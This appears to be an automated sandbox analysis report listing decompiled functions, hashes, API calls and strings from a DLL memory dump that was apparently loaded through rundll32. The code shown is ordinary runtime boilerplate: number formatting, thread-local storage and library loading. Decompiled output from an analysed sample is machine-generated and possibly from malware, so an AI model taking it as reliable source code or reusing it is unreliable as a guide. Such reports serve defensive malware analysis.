Instruction ID: 870c1a0b35fb53cf576232bc4ec8f793c1a417d5e6caba55112a33d972239fad
Opcode Fuzzy Hash: dba2ff9360f87b1edf8369a11c87ca8840a9c0efa795440764ddbd28e5113fb6
Instruction Fuzzy Hash: 58014012C34E28DDD203AA7A984154AA6AD9F973E0B19C793D0467A006FF9054E39695

Uniqueness

Uniqueness Score: -1.00%

Function 6EA86B40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6EA86B40(short* __ecx, signed int __edx) {
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t37;
				short _t38;
				void* _t39;
				signed int _t45;
				short _t50;
				void* _t51;
				short _t52;
				signed int _t53;
				signed int _t62;
				unsigned int _t66;
				char* _t78;
				signed int _t85;
				signed short _t88;
				intOrPtr _t90;
				char* _t91;
				void* _t94;
				void* _t95;
				intOrPtr* _t96;

				_t96 = _t95 - 0x30;
				_t90 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t90 == 0) {
					L6:
					_t52 = 0;
					L7:
					return _t52;
				}
				_push(1);
				_t30 = E6EA81C10(_t90,  &M6EACF3B9);
				_t96 = _t96 + 4;
				_t52 = 1;
				if(_t30 != 0) {
					goto L7;
				}
				if((__edx |  *(_t96 + 0x44)) == 0) {
					_push(1);
					return E6EA81C10(_t90, "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool");
				}
				 *_t96 = _t90;
				_t91 = 0;
				_t62 =  *((intOrPtr*)(__ecx + 0x18)) - __edx;
				asm("sbb esi, eax");
				if(_t62 >= 0) {
					__eflags = _t62 - 0x1a;
					asm("sbb eax, 0x0");
					if(_t62 >= 0x1a) {
						_t85 = _t62;
						_t78 = "_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool";
						_push(1);
						_t34 = E6EA81C10( *_t96, _t78);
						_t96 = _t96 + 4;
						__eflags = _t34;
						if(_t34 != 0) {
							goto L7;
						}
						__eflags = _t85 - 0x2710;
						_t53 = _t85;
						asm("sbb eax, 0x0");
						if(_t85 < 0x2710) {
							_t36 = 0x27;
							L18:
							__eflags = _t53 - 0x63;
							if(_t53 > 0x63) {
								_t66 = _t53 & 0x0000ffff;
								_t53 = (_t66 >> 2) * 0x147b >> 0x11;
								 *((short*)(_t96 + _t36 + 6)) =  *((_t66 - _t53 * 0x00000064 & 0x0000ffff) + (_t66 - _t53 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
								_t36 = _t36 + 0xfffffffe;
								__eflags = _t36;
							}
							__eflags = _t53 - 0xa;
							if(_t53 >= 0xa) {
								_t24 = _t53 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899"; // 0x31303030
								 *((short*)(_t96 + _t36 + 6)) =  *(_t53 + _t24) & 0x0000ffff;
								_t37 = _t36 + 0xfffffffe;
								__eflags = _t37;
							} else {
								 *((char*)(_t96 + _t36 + 7)) = _t53 + 0x30;
								_t37 = _t36 - 1;
							}
							_push(0x27 - _t37);
							_push(_t96 + _t37 + 8);
							_push(0);
							_t38 = E6EA818D0( *_t96, 0x6eacf570);
							_t96 = _t96 + 0xc;
							_t52 = _t38;
							goto L7;
						}
						_t39 = 0x27;
						do {
							_t94 = _t39;
							_t88 = E6EA9C5D0(_t53, _t91, 0x2710, 0);
							 *(_t96 + 4) = E6EA9C650(_t53, _t91, 0x2710, 0);
							_t45 = ((_t88 & 0x0000ffff) >> 2) * 0x147b >> 0x11;
							_t8 = _t45 + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899"; // 0x31303030
							__eflags = 0x5f5e0ff - _t53;
							_t53 =  *(_t96 + 4);
							asm("sbb ecx, esi");
							_t91 = _t78;
							 *((short*)(_t96 + _t94 + 4)) =  *(_t45 + _t8) & 0x0000ffff;
							 *((short*)(_t96 + _t94 + 6)) =  *((_t88 - _t45 * 0x00000064 & 0x0000ffff) + (_t88 - _t45 * 0x00000064 & 0x0000ffff) + "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899") & 0x0000ffff;
							_t16 = _t94 - 4; // 0x23
							_t39 = _t16;
						} while (__eflags < 0);
						goto L18;
					}
					 *((intOrPtr*)(_t96 + 8)) = _t62 + 0x61;
					_t50 = E6EA83490(_t96 + 8, _t96 + 8,  *_t96);
					_t96 = _t96 + 8;
					_t52 = _t50;
					goto L7;
				}
				_push(0x10);
				_t51 = E6EA81C10( *_t96,  &M6EACF395);
				_t96 = _t96 + 4;
				if(_t51 != 0) {
					goto L7;
				}
				 *__ecx = 1;
				goto L6;
			}

0x6ea86b44
0x6ea86b47
0x6ea86b4c
0x6ea86b9c
0x6ea86b9c
0x6ea86b9e
0x00000000
0x6ea86ba0
0x6ea86b59
0x6ea86b5b
0x6ea86b60
0x6ea86b63
0x6ea86b67
0x00000000
0x00000000
0x6ea86b71
0x6ea86baf
0x00000000
0x6ea86bb6
0x6ea86b76
0x6ea86b79
0x6ea86b7b
0x6ea86b7d
0x6ea86b7f
0x6ea86bbb
0x6ea86bc0
0x6ea86bc3
0x6ea86be0
0x6ea86be5
0x6ea86bea
0x6ea86bec
0x6ea86bf1
0x6ea86bf4
0x6ea86bf6
0x00000000
0x00000000
0x6ea86bf8
0x6ea86c00
0x6ea86c02
0x6ea86c05
0x6ea86c80
0x6ea86c85
0x6ea86c85
0x6ea86c88
0x6ea86c8a
0x6ea86c98
0x6ea86cab
0x6ea86cb0
0x6ea86cb0
0x6ea86cb0
0x6ea86cb3
0x6ea86cb6
0x6ea86cc2
0x6ea86cca
0x6ea86ccf
0x6ea86ccf
0x6ea86cb8
0x6ea86cbb
0x6ea86cbf
0x6ea86cbf
0x6ea86ce5
0x6ea86ce6
0x6ea86ce7
0x6ea86ce9
0x6ea86cee
0x6ea86cf1
0x00000000
0x6ea86cf1
0x6ea86c07
0x6ea86c10
0x6ea86c10
0x6ea86c20
0x6ea86c30
0x6ea86c40
0x6ea86c46
0x6ea86c55
0x6ea86c57
0x6ea86c60
0x6ea86c62
0x6ea86c64
0x6ea86c74
0x6ea86c79
0x6ea86c79
0x6ea86c79
0x00000000
0x6ea86c7e
0x6ea86bcc
0x6ea86bd4
0x6ea86bd9
0x6ea86bdc
0x00000000
0x6ea86bdc
0x6ea86b89
0x6ea86b8b
0x6ea86b90
0x6ea86b95
0x00000000
0x00000000
0x6ea86b97
0x00000000

APIs

__aullrem.LIBCMT ref: 6EA86C1B
__aulldiv.LIBCMT ref: 6EA86C2B

Strings

'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6EA86B54
_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6EA86BAA, 6EA86BE5
{invalid syntax}, xrefs: 6EA86B84

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: 84076f8a0328085db6b7a2a9c25cdcaebecdb7ff6e60b0671a412ef39e7ee387
Instruction ID: 1d077883221a74af23a89266445cd35c4c3642307ce99a726e8ff98098688d72
Opcode Fuzzy Hash: 84076f8a0328085db6b7a2a9c25cdcaebecdb7ff6e60b0671a412ef39e7ee387
Instruction Fuzzy Hash: 5F4176747682104BE3149AA8D845B3BBBD5DFD4708F24483DE889CF3D2E665CCD183AA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8D000, Relevance: 8.8, APIs: 7, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E6EA8D000(void* __ebx, void* __edi) {
				void _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				void* _v33;
				void* _v35;
				void* _v36;
				signed int _v39;
				void* _v44;
				long _v48;
				char _v76;
				void* __esi;
				long _t30;
				void* _t32;
				long _t33;
				void* _t35;
				void* _t37;
				void* _t38;
				signed char _t43;
				signed char _t44;
				signed int _t46;
				void** _t49;
				void* _t51;
				long _t53;
				void* _t55;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t65;
				void* _t67;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;
				void* _t89;
				void* _t90;
				void* _t91;

				_t77 = __edi;
				_t55 = __ebx;
				_push(_t79);
				_t30 =  *0x6eadd04c; // 0x0
				if(_t30 == 0) {
					_t32 = TlsGetValue(E6EA92960(__ebx, 0x6eadd04c, __edi, _t79));
					__eflags = _t32 - 1;
					if(_t32 <= 1) {
						goto L5;
					} else {
						goto L4;
					}
				} else {
					_t32 = TlsGetValue(_t30);
					if(_t32 > 1) {
						L4:
						__eflags =  *_t32 - 1;
						_t82 = _t32;
						if( *_t32 == 1) {
							goto L18;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t33 =  *0x6eadd04c; // 0x0
						if(_t33 == 0) {
							_t35 = TlsGetValue(E6EA92960(_t55, 0x6eadd04c, _t77, _t79));
							__eflags = _t35;
							if(_t35 != 0) {
								goto L7;
							} else {
								goto L10;
							}
						} else {
							_t35 = TlsGetValue(_t33);
							if(_t35 == 0) {
								L10:
								_t37 =  *0x6eade128; // 0x2d40000
								__eflags = _t37;
								if(_t37 != 0) {
									L13:
									_t38 = HeapAlloc(_t37, 0, 0xc);
									__eflags = _t38;
									if(__eflags == 0) {
										goto L20;
									} else {
										 *_t38 = 0;
										 *(_t38 + 8) = 0x6eadd04c;
										_t82 = _t38;
										_t53 =  *0x6eadd04c; // 0x0
										__eflags = _t53;
										if(_t53 == 0) {
											_t53 = E6EA92960(_t55, 0x6eadd04c, _t77, _t82);
										}
										TlsSetValue(_t53, _t82);
										goto L17;
									}
								} else {
									_t37 = GetProcessHeap();
									__eflags = _t37;
									if(__eflags == 0) {
										L20:
										E6EAA92F0(_t55, 0xc, 4, _t77, _t79, __eflags);
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t55);
										_push(_t77);
										_push(_t79);
										_t90 = _t89 - 0x38;
										_v36 = _t90;
										_v24 = 0xffffffff;
										_v28 = E6EA939B0;
										_v32 =  *[fs:0x0];
										 *[fs:0x0] =  &_v32;
										_v48 = 0xc;
										_v44 = 4;
										_v24 = 0;
										asm("movsd xmm0, [edx+0x10]");
										asm("movsd xmm2, [edx]");
										asm("movsd xmm1, [edx+0x8]");
										asm("movsd [ebp-0x34], xmm0");
										asm("movsd [ebp-0x3c], xmm1");
										asm("movsd [ebp-0x44], xmm2");
										_push( &_v76);
										E6EA82150( &_v48, 0x6eacfba0);
										_t91 = _t90 + 4;
										_t43 = _v44;
										__eflags = _t43;
										if(_t43 == 0) {
											_t44 = 4;
											__eflags = 4 - 3;
											if(4 != 3) {
												_t61 = 0x6eacfb98;
											} else {
												_t65 = _v36;
												_v48 = _t65;
												_v20 = 1;
												 *((intOrPtr*)( *((intOrPtr*)(_t65 + 4))))( *_t65);
												_t91 = _t91 + 4;
												_t49 = _v48;
												_t67 = _t49[1];
												__eflags =  *(_t67 + 4);
												if( *(_t67 + 4) != 0) {
													_t51 =  *_t49;
													__eflags =  *((intOrPtr*)(_t67 + 8)) - 9;
													if( *((intOrPtr*)(_t67 + 8)) >= 9) {
														_t51 =  *(_t51 - 4);
													}
													HeapFree( *0x6eade128, 0, _t51);
												}
												HeapFree( *0x6eade128, 0, _v36);
												_t61 = 0x6eacfb98;
												_t44 = 4;
											}
											goto L32;
										} else {
											__eflags = _t43 - 4;
											if(_t43 != 4) {
												_t44 = _t43;
												_t63 = _v39;
											} else {
												_t61 = 0x6eacfb98;
												_t44 = 2;
												L32:
												_t63 = _t61 << 0x00000018 | 0x00000028;
												__eflags = _t63;
											}
										}
										_t46 = _t44 & 0x000000ff | _t63 << 0x00000008;
										__eflags = _t46;
										 *[fs:0x0] = _v28;
										return _t46;
									} else {
										 *0x6eade128 = _t37;
										goto L13;
									}
								}
							} else {
								L7:
								_t80 = 0;
								if(_t35 != 1) {
									_t82 = _t35;
									L17:
									 *_t82 = 1;
									 *(_t82 + 4) = 0;
									L18:
									_t80 = _t82 + 4;
								}
								return _t80;
							}
						}
					}
				}
			}

0x6ea8d000
0x6ea8d000
0x6ea8d000
0x6ea8d001
0x6ea8d008
0x6ea8d023
0x6ea8d029
0x6ea8d02c
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d00a
0x6ea8d00b
0x6ea8d014
0x6ea8d02e
0x6ea8d02e
0x6ea8d031
0x6ea8d033
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d016
0x6ea8d039
0x6ea8d039
0x6ea8d040
0x6ea8d063
0x6ea8d069
0x6ea8d06b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea8d042
0x6ea8d043
0x6ea8d04b
0x6ea8d06d
0x6ea8d06d
0x6ea8d072
0x6ea8d074
0x6ea8d084
0x6ea8d089
0x6ea8d08e
0x6ea8d090
0x00000000
0x6ea8d092
0x6ea8d092
0x6ea8d098
0x6ea8d09f
0x6ea8d0a1
0x6ea8d0a6
0x6ea8d0a8
0x6ea8d0af
0x6ea8d0af
0x6ea8d0b6
0x00000000
0x6ea8d0b6
0x6ea8d076
0x6ea8d076
0x6ea8d07b
0x6ea8d07d
0x6ea8d0d0
0x6ea8d0da
0x6ea8d0df
0x6ea8d0e1
0x6ea8d0e2
0x6ea8d0e3
0x6ea8d0e4
0x6ea8d0e5
0x6ea8d0e6
0x6ea8d0e7
0x6ea8d0e8
0x6ea8d0e9
0x6ea8d0ea
0x6ea8d0eb
0x6ea8d0ec
0x6ea8d0ed
0x6ea8d0ee
0x6ea8d0ef
0x6ea8d0f3
0x6ea8d0f4
0x6ea8d0f5
0x6ea8d0f6
0x6ea8d0f9
0x6ea8d0fc
0x6ea8d103
0x6ea8d114
0x6ea8d117
0x6ea8d120
0x6ea8d123
0x6ea8d127
0x6ea8d131
0x6ea8d136
0x6ea8d13a
0x6ea8d144
0x6ea8d149
0x6ea8d14e
0x6ea8d153
0x6ea8d154
0x6ea8d159
0x6ea8d15c
0x6ea8d15f
0x6ea8d161
0x6ea8d179
0x6ea8d17b
0x6ea8d17e
0x6ea8d1ef
0x6ea8d180
0x6ea8d180
0x6ea8d185
0x6ea8d18b
0x6ea8d193
0x6ea8d195
0x6ea8d198
0x6ea8d19b
0x6ea8d19e
0x6ea8d1a2
0x6ea8d1a4
0x6ea8d1a6
0x6ea8d1aa
0x6ea8d1ac
0x6ea8d1ac
0x6ea8d1b8
0x6ea8d1b8
0x6ea8d1c8
0x6ea8d1cd
0x6ea8d1d7
0x6ea8d1d7
0x00000000
0x6ea8d163
0x6ea8d163
0x6ea8d166
0x6ea8d1e3
0x6ea8d1ea
0x6ea8d168
0x6ea8d168
0x6ea8d172
0x6ea8d1f9
0x6ea8d1ff
0x6ea8d1ff
0x6ea8d1ff
0x6ea8d166
0x6ea8d20f
0x6ea8d20f
0x6ea8d211
0x6ea8d21f
0x6ea8d07f
0x6ea8d07f
0x00000000
0x6ea8d07f
0x6ea8d07d
0x6ea8d04d
0x6ea8d04d
0x6ea8d04d
0x6ea8d052
0x6ea8d054
0x6ea8d0bc
0x6ea8d0bc
0x6ea8d0c2
0x6ea8d0c9
0x6ea8d0c9
0x6ea8d0c9
0x6ea8d0cf
0x6ea8d0cf
0x6ea8d04b
0x6ea8d040
0x6ea8d014

APIs

TlsGetValue.KERNEL32(00000000,00000001,6EA8C746), ref: 6EA8D00B
TlsGetValue.KERNEL32(00000000,00000001,6EA8C746), ref: 6EA8D023
TlsGetValue.KERNEL32(00000000), ref: 6EA8D043
TlsGetValue.KERNEL32(00000000), ref: 6EA8D063
GetProcessHeap.KERNEL32 ref: 6EA8D076
HeapAlloc.KERNEL32(02D40000,00000000,0000000C), ref: 6EA8D089
TlsSetValue.KERNEL32(00000000,00000000,02D40000,00000000,0000000C), ref: 6EA8D0B6

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 2e55276b64754fdd30870e08e8d029792b8f7432a3d12ac94972098ddfab8adf
Instruction ID: 3b1b218bb0608988749d4fe0d44eb34c8fc661a674b64a29d6411e99f7ce68f5
Opcode Fuzzy Hash: 2e55276b64754fdd30870e08e8d029792b8f7432a3d12ac94972098ddfab8adf
Instruction Fuzzy Hash: C311AE706007028AEB104BF58854B577AEDAB82244F074D26D906EF240D725DCC7DE6D

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA3571, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EAA3571(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6EAA4073(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6EAA33C8(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6EAA1F75(GetLastError());
									_t18 =  *((intOrPtr*)(E6EAA1FCF()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6EAA3633(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6EAA1F75(GetLastError());
						_t18 =  *((intOrPtr*)(E6EAA1FCF()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6EAA3633(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6EAA365A(_a8);
				return 0;
			}

0x6eaa3577
0x6eaa357c
0x6eaa3593
0x6eaa35c5
0x6eaa35cf
0x6eaa35e8
0x6eaa35ee
0x6eaa35fc
0x6eaa3609
0x6eaa3610
0x6eaa3629
0x6eaa362c
0x6eaa3612
0x6eaa3619
0x6eaa3624
0x6eaa3624
0x6eaa362e
0x6eaa362f
0x00000000
0x6eaa362f
0x6eaa35f3
0x6eaa35fa
0x00000000
0x00000000
0x00000000
0x6eaa35fa
0x6eaa35d8
0x6eaa35e3
0x00000000
0x6eaa35e3
0x6eaa3595
0x6eaa359b
0x6eaa35ae
0x6eaa35b1
0x6eaa35b3
0x6eaa35b5
0x00000000
0x6eaa35b5
0x6eaa35a1
0x6eaa35a8
0x00000000
0x00000000
0x00000000
0x6eaa35a8
0x6eaa3581
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6EAA358D

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 71667911776de8cbaedf53cc49fc35a58ce45dfaf6e7e8723be775f95cdd1192
Instruction ID: 95cd8fb41e359c92cdd925e39c55538e8141e3e5d64be4d50ef8dc75e3e85d6e
Opcode Fuzzy Hash: 71667911776de8cbaedf53cc49fc35a58ce45dfaf6e7e8723be775f95cdd1192
Instruction Fuzzy Hash: E121C5716043067FC700AFEDC94889FB7EDEF053587158955F6549B210DB30EC888B68

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA0422, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EAA0422(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6eade568 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6ead60c8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6EAA1EF8(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6eaa0429
0x6eaa049d
0x6eaa042e
0x6eaa0430
0x6eaa0437
0x6eaa043b
0x6eaa0444
0x6eaa0453
0x6eaa045c
0x6eaa0460
0x6eaa04a9
0x6eaa04ab
0x6eaa04af
0x6eaa04b2
0x6eaa04b2
0x6eaa04b8
0x6eaa04b8
0x6eaa04a4
0x6eaa04a8
0x6eaa04a8
0x6eaa0462
0x6eaa046b
0x6eaa0495
0x6eaa0498
0x6eaa049a
0x6eaa049a
0x00000000
0x6eaa049a
0x6eaa046d
0x6eaa0478
0x6eaa047d
0x6eaa0482
0x00000000
0x00000000
0x6eaa0489
0x6eaa048f
0x6eaa0493
0x00000000
0x00000000
0x00000000
0x6eaa0493
0x6eaa0440
0x00000000
0x00000000
0x00000000
0x6eaa0442
0x6eaa04a2
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EAA04E3,00000000,?,00000001,00000000,?,6EAA055A,00000001,FlsFree,6EAD6184,FlsFree,00000000), ref: 6EAA04B2

Strings

api-ms-, xrefs: 6EAA0472

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bb4f99a2dc1ea3d41ef819f155846787088b081b2ac46910c4c8fa9a24c1e140
Instruction ID: cba9e8abc870253956df36dc34a3df41615a963eb5eb5df4a20f56da2f75f038
Opcode Fuzzy Hash: bb4f99a2dc1ea3d41ef819f155846787088b081b2ac46910c4c8fa9a24c1e140
Instruction Fuzzy Hash: 4D11CA35A40725AFDB528AAC8C8474D37A4BF027B0F258125FA55FB280E730ED8186D9

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA12ED, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6EAA12ED(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6eadd804; // 0x877aaf3f
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6EAA9B33, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6eaaa154(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x6eaa1302
0x6eaa130d
0x6eaa1313
0x6eaa1317
0x6eaa1322
0x6eaa132a
0x6eaa1334
0x6eaa133a
0x6eaa133e
0x6eaa1345
0x6eaa134b
0x6eaa134b
0x6eaa133e
0x6eaa1351
0x6eaa1356
0x6eaa1356
0x6eaa135f
0x6eaa1369

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,877AAF3F,00000000,?,00000000,6EAA9B33,000000FF,?,6EAA127D,?,?,6EAA1251,?), ref: 6EAA1322
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EAA1334
FreeLibrary.KERNEL32(00000000,?,00000000,6EAA9B33,000000FF,?,6EAA127D,?,?,6EAA1251,?), ref: 6EAA1356

Strings

mscoree.dll, xrefs: 6EAA131B
CorExitProcess, xrefs: 6EAA132C

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 840713917f11ee171440ef2801f04710896f7c41448464d765c6b288be6cefdb
Instruction ID: e29e60b12b54a6e1d806ad476887edf917ece5aca41e359d2af02e43f3e53692
Opcode Fuzzy Hash: 840713917f11ee171440ef2801f04710896f7c41448464d765c6b288be6cefdb
Instruction Fuzzy Hash: 7F018471900B56EFDB028F98CD04FBE7BF9FB44611F044525E911A6680DB759944CA54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C280() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "SetThreadDescription");
				}
			}

0x6ea8c285
0x6ea8c28d
0x6ea8c29c
0x6ea8c28f
0x6ea8c29b
0x6ea8c29b

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6EA8C285
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6EA8C295

Strings

kernel32, xrefs: 6EA8C280
SetThreadDescription, xrefs: 6EA8C28F

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
